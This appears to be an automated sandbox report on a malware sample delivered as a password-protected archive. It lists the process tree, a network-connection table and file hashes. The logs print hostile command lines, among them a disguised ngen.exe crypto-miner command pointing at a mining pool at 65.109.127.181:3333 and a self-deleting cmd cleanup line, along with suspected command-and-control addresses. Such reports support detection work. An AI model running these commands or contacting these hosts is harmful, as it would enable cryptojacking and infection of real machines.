C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6524 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Users\Admin\Downloads\7z2406-x64.exe
"C:\Users\Admin\Downloads\7z2406-x64.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5404 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6640 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6736 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\" -spe -an -ai#7zMap28562:138:7zEvent21301
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\" -spe -an -ai#7zMap26001:216:7zEvent25948
C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\Setup.exe
"C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___\!#Fileş_#!UŞe~Passw0rd__~.~140617~.~__\Setup.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
C:\Users\Admin\AppData\Local\Temp\coml.au3
C:\Users\Admin\AppData\Local\Temp\coml.au3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 --field-trial-handle=1740,i,5882052732358998074,2645709799701911228,131072 /prefetch:2
C:\ProgramData\DGIJEGHDAE.exe
"C:\ProgramData\DGIJEGHDAE.exe"
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\ProgramData\HJJJECFIEC.exe
"C:\ProgramData\HJJJECFIEC.exe"
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HJDAKFBFBFBA" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | yodgxd060624l18.xyz | udp |
| US | 172.67.221.92:443 | yodgxd060624l18.xyz | tcp |
| US | 172.67.221.92:443 | yodgxd060624l18.xyz | tcp |
| US | 172.67.221.92:443 | yodgxd060624l18.xyz | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| IE | 2.18.24.9:80 | apps.identrust.com | tcp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | tcp |
| US | 8.8.8.8:53 | 92.221.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.193.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.204.74:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | href.li | udp |
| US | 192.0.78.26:443 | href.li | tcp |
| US | 192.0.78.26:443 | href.li | tcp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| GB | 216.58.204.74:443 | content-autofill.googleapis.com | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 26.78.0.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.145.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.14:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.14:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 14.125.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.124.203.66.in-addr.arpa | udp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | gfs270n382.userstorage.mega.co.nz | udp |
| LU | 89.44.168.98:443 | gfs270n382.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.98:443 | gfs270n382.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.98:443 | gfs270n382.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.98:443 | gfs270n382.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| LU | 89.44.168.98:443 | gfs270n382.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.98:443 | gfs270n382.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 98.168.44.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| LU | 89.44.168.98:443 | gfs270n382.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | 7zip.org | udp |
| DE | 49.12.202.237:443 | 7zip.org | tcp |
| DE | 49.12.202.237:443 | 7zip.org | tcp |
| DE | 49.12.202.237:80 | 7zip.org | tcp |
| DE | 49.12.202.237:80 | 7zip.org | tcp |
| US | 8.8.8.8:53 | 7-zip.org | udp |
| DE | 49.12.202.237:443 | 7-zip.org | tcp |
| DE | 49.12.202.237:443 | 7-zip.org | tcp |
| US | 8.8.8.8:53 | 237.202.12.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gfs270n325.userstorage.mega.co.nz | udp |
| LU | 89.44.168.35:443 | gfs270n325.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.35:443 | gfs270n325.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.35:443 | gfs270n325.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.35:443 | gfs270n325.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.35:443 | gfs270n325.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.35:443 | gfs270n325.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 35.168.44.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | feeldog.xyz | udp |
| US | 104.21.13.222:443 | feeldog.xyz | tcp |
| US | 8.8.8.8:53 | 222.13.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| US | 8.8.8.8:53 | 58.251.201.195.in-addr.arpa | udp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| US | 8.8.8.8:53 | businessdownloads.ltd | udp |
| US | 172.67.212.123:443 | businessdownloads.ltd | tcp |
| US | 8.8.8.8:53 | 123.212.67.172.in-addr.arpa | udp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| US | 8.8.8.8:53 | i.imgur.com | udp |
| US | 199.232.196.193:443 | i.imgur.com | tcp |
| US | 8.8.8.8:53 | 193.196.232.199.in-addr.arpa | udp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| DE | 195.201.251.58:9000 | 195.201.251.58 | tcp |
| FI | 135.181.22.88:80 | 135.181.22.88 | tcp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.22.181.135.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 8.8.8.8:53 | proresupdate.com | udp |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| US | 8.8.8.8:53 | contur2fa.recipeupdates.rest | udp |
| US | 172.67.197.250:443 | contur2fa.recipeupdates.rest | tcp |
| US | 8.8.8.8:53 | 146.112.152.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.197.67.172.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | tcp | |
| US | 172.67.197.250:443 | contur2fa.recipeupdates.rest | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp | |
| FI | 65.109.127.181:3333 | tcp |
Files
\??\pipe\crashpad_204_MWRWLOJJYPFGPBRR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | a069f00610fa38d07150696c3c966d8d |
| SHA1 | ba4f16bc7e7a019ff102668efcbbaa525de1b4e4 |
| SHA256 | 97b0013a822a7a88f6db29df364af664c8f00c56cf5d6c8d2c692dd73af73e8c |
| SHA512 | 7ee82e2b9ce00a262ac2f3f22d23d3a95f21bbe152e05589b3b745ba88ea9c821abbaba69a73573e3307dda7a93a513ac7fcbe21962eb1964579b514d3e070ca |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2d503fee7666fd93aa49663c40f8fc96 |
| SHA1 | fdd1fae743a6ce1fc25356fa916aa654ab7f2ed0 |
| SHA256 | 023f26da4da360e47db4d03adbf8365a0182aeb93bb57c0bc4360a3b8dbde773 |
| SHA512 | 1750a477f5d955069e1f915cbcaeeef233cb1efdb77b3922e6530147b668b44303fcdc3346f57743676e8895a93ab1d709d3508e101e6a26008a47d764b0d2b3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 464a95f45ed5b7fc327077c70ec26fbe |
| SHA1 | aab8d666ecd0f728ab4c40e3f152a6e59f625c57 |
| SHA256 | 364f7199a95861cb9b5606763306e49d59b3ff21f2c9744f228054376016392c |
| SHA512 | af11da6a49780488d5cb085e2e1228495bde74ad886d9288e366090e4b1462b8398eb4729ff77a74d8c0313a4422fcbe09e50238b70aadb0d0be739160e2d4bc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b68c22c2badad6c78859c0961221031e |
| SHA1 | 4a5b94e9649c59fceca0a053170a48463c30b58b |
| SHA256 | f0b38356df5a78c6ce4d549aed5f48b7f39a93a1f2bb36171f0c237ecbdc9a54 |
| SHA512 | 4ec8ca0bd357fb135ee23372aa473b743359fd27b0aa8b3af4f8159c53c25e827c698463b7bef273e3956038d643b0d26b1d27e14c143956b4a67ffc63f655c6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002a
| MD5 | 99916ce0720ed460e59d3fbd24d55be2 |
| SHA1 | d6bb9106eb65e3b84bfe03d872c931fb27f5a3db |
| SHA256 | 07118bf4bbc3ba87d75cbc11ddf427219a14d518436d7f3886d75301f897edaf |
| SHA512 | 8d3d52e57806d1850b57bffee12c1a8d9e1a1edcf871b2395df5c889991a183a8d652a0636d5452068f5ef78d37e08ce10b2b2f4e05c3e3c0f2f2230310418a8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\MANIFEST-000001
| MD5 | 3fd11ff447c1ee23538dc4d9724427a3 |
| SHA1 | 1335e6f71cc4e3cf7025233523b4760f8893e9c9 |
| SHA256 | 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed |
| SHA512 | 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 453e5212c01e2a71483f035e2621e5ac |
| SHA1 | 26cff3cabc3978a00322b51fcc64b64016b71330 |
| SHA256 | 78b63d1660f843d735e184c6b11243c8cd6e0f17115fb21675e3f9ccceb67435 |
| SHA512 | e5b044b25b123e5587cf4e5a2bf538d7244a20c1f2ba4b23ef76ff2bf1946eb9b3278a4148be3a299b6551a66c4b267960fe278859b6b005a721724fe5a32ecb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3cc9e65469218b17f5bfa2b2a850f791 |
| SHA1 | 6785871e8b4471bd3670644a70ffc8e76fdea567 |
| SHA256 | b8b8bd4628096122f93bd91fd34db2c4488e0135f4fed666a5257432446e7241 |
| SHA512 | 9c923ce6f269d2ebb09965b76dde0c2f4fe3162918012f3b9cec8270fda703817db39f021b3015d5c613122b8f423e6c52ce2a3f1b0987c7a038716d8d0e0e6d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57f906.TMP
| MD5 | 66fb73e6e39d00bdfa1de04496078d25 |
| SHA1 | 376841a353782df8605117f7176450a7994af7a2 |
| SHA256 | 740eb878010c3b1b794b9753d3c226fdd56d9f300fd7372d894596bffbdff23c |
| SHA512 | fd4e88fa1a2a4bd777907d619df035b5cc38e4d8aef66fa67eaae21681e27fe8a9f49d9e9f12af19fa05d768210da4a99ef7ff1fd6c9de87310fed10fb89d31d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | d2f141d2c4d0c298b4947fea2466220b |
| SHA1 | 6c34261a2b4177f5fd0bf7dadda552b77a41743a |
| SHA256 | 40ce8d9e7e1a1850fdf560602661f586881e220eaf675befc8ad6057f60adbc5 |
| SHA512 | 6a12430752f5bc1ad78818f0785de6b2455ddc27303be01d71f6dd923f17b37fbed005e55e37fa3cfde7be51296786bc87199798f2a7315fe0bcad983dc648bb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 56dfdbdacdcd6f1811e390bd4fe6493a |
| SHA1 | 366a8cb1cf97ae09ddf05590ffce93af8cc269e8 |
| SHA256 | c18538df549d945d3fa95c2ecbfd887e9b7bfd7f0f53fcfcdb47f3fae7f47518 |
| SHA512 | 24b101af99ca50ec367db41cda9c3b15629ba1669e82f572b893707af15b8d686a1198942b8161f7de19533ce53a1ac792c277e25fbfa0e4e58080dc48037ca0 |
C:\Users\Admin\Downloads\Unconfirmed 200288.crdownload
| MD5 | d8af785ca5752bae36e8af5a2f912d81 |
| SHA1 | 54da15671ad8a765f3213912cba8ebd8dac1f254 |
| SHA256 | 6220bbe6c26d87fc343e0ffa4e20ccfafeca7dab2742e41963c40b56fb884807 |
| SHA512 | b635b449f49aac29234f677e662be35f72a059401ea0786d956485d07134f9dd10ed284338503f08ff7aad16833cf034eb955ca34e1faf35a8177ccad1f20c75 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\03dbc815-2a8a-4979-a963-26f5baf9cee9.tmp
| MD5 | 19fe92e7ee867ff202d127b5a854b06e |
| SHA1 | 447e2ae5c377633600ef69134a6e95307cc67c64 |
| SHA256 | b4298a1899fd47b054de38530cac0859409df212c4ff2f1540eb0e6fb38330e0 |
| SHA512 | 7e4f573e82e176b3abb92f847b5fe89fe9c8bf2a97c61bdcac5e07c1f1efb57fc4df2d0edeaf0e654b94001c5f5eac34285f10b05a80bac924fd12d2baba5495 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 205d8c9664e85a9448b5f530f7205dab |
| SHA1 | 72eb4c4290ec62b58734d1cbdb4f121c8a01800c |
| SHA256 | 7202efc4b5b8e23ad0c21255087d6c0010673385a76b75daff3b9cd20951dae2 |
| SHA512 | 5720eea28337d415683b18ad424dc079d797dd0cec0e677094cdfc7a5cf80b51fd4bb97ea89f4c5464e0472b581bb4c9a455f3938efedf55838d91d7ab950b12 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e0a220c3dd53712c7f43888d4decd6d9 |
| SHA1 | cc3e43fbf461d0c21342f25a70009af1b3bc8cc8 |
| SHA256 | 691dff8f2ce34524bf3dd702aef5fbd2448632fa8e0f3d69e853908c7a184ee6 |
| SHA512 | d39d6d1c5567bcb921bc2eacefee162970c7d58fb201613fcc590f30b175b67843e6d1b6ba8e10578f192caae9174cff104fe0999671e6631c8a4e5f7ac755ff |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | dc6543ced9ad8ef9e97b88619d1d2acd |
| SHA1 | e2d1786967ef1249f08fd9fc84ec75c237755db5 |
| SHA256 | 26259d34ec49b67b23f0bbd2e14355739f642715554e426ebe5b32b2007f33f9 |
| SHA512 | f09bb9438214dedea465729fb68af32760cc9db3359ef7726ae8f501892735e206044a1489188ad035e309ddc3a0c88da1e50ecf9bb578eded80284c079e0ea5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5830fe.TMP
| MD5 | c0cee68eb822291ba457516749f60aaa |
| SHA1 | c4d281d218ee5c0c2c021457644aa78fec5e3ce8 |
| SHA256 | 478a0cfb9602a3f370ac2c9a82d3357ce9868e56df236e828669a76761370af0 |
| SHA512 | 5662ed0fc2eed0a2afea320f023433c7c7fc780ccb378619c1d919bbe00e6307a4b304969d9d59e50ceaa8c04a7c900222744c013c3e2f67115d3bb8a811b12e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000029
| MD5 | 950eca48e414acbe2c3b5d046dcb8521 |
| SHA1 | 1731f264e979f18cdf08c405c7b7d32789a6fb59 |
| SHA256 | c0bbe530abfce19e06697bc4358eb426e076ccdb9113e22df4a6f32085da67a2 |
| SHA512 | 27e55525ade4d099a6881011f6e2e0d5d3a9ca7181f4f014dc231d40b3b1907d0d437b0c44d336c25dd7b73209cd773b8563675ac260c43c7752e2d2d694d4d9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 001a759b1abe8cb13dfd9b764ce7fa90 |
| SHA1 | 9b9287bf74d510965d51a1ef0c48d681690b74ed |
| SHA256 | 88af99faa7dac0ed495519cd124a47d841b453d39a695da85b585f6f7f2ea392 |
| SHA512 | e899aabae8a98b453e7f000e37c6cb0b03da7072c4f9f99bf56c7c979223a14c93385cf785cd6de4da50a8d747bf5aab6aea6376f15b54c30e4b0cf2a4bb7d03 |
\Program Files\7-Zip\7-zip.dll
| MD5 | 7ec019d8445f4dcdb91a380c9d592957 |
| SHA1 | 15fd8375e2e282a90d3df14041272e5ac29e7c93 |
| SHA256 | 1cc179f097ee439bb35a582059cbc727d9cea0d5c43dfaa57f9f03050cfaea03 |
| SHA512 | d71a79091fcc6a96c24d95662a18cc24145b9531145ef0bcb4e882c12f5bb5ca6c7a9b9e50024c9c0bf4cb6bf40dca7627cecbfddd637142d04a194e1956ae9b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 812d13f3f32a4de43b8e08bc61cd0942 |
| SHA1 | 5045f41087e1c3fa3ebacf4c6c39a636cd581142 |
| SHA256 | 7d5d8d103064bc6e71d306b15218ed609871ba90858080d77440128d733d1d34 |
| SHA512 | 37fc1cb0a52e5e0526f65ab40e10b7eaa57ca182b1cf8790f72ef1d2508ab7dad0cefde19365998cb3d8ba39323c817b65b67e76fe6aa22e3f680007cbe942e9 |
C:\Program Files\7-Zip\7zG.exe
| MD5 | 57390724513dc5d7bd369c3c36d3744e |
| SHA1 | 90af197d7f82ee03f283459e9d0976f8c7c157ce |
| SHA256 | 1bb7dc64af47f17e70ff86087bae4748e5d105758ddf2077acc45d2771b1909f |
| SHA512 | 7471f485f577525066c3d205b2fe099dda3063456021291b329cf225c803baffd9b55422afbefe449302ccda139c1afc9ccb7bb60a6b5547db7ad0420ff2cf5c |
C:\Users\Admin\Downloads\!#Fileş_#!UŞe_Passw0rd___._140617_.___.zip
| MD5 | 2ce70ee0897354a5750f400470f490b1 |
| SHA1 | b03e6d334c7dbefc8a349a02a3475aeb419acc3f |
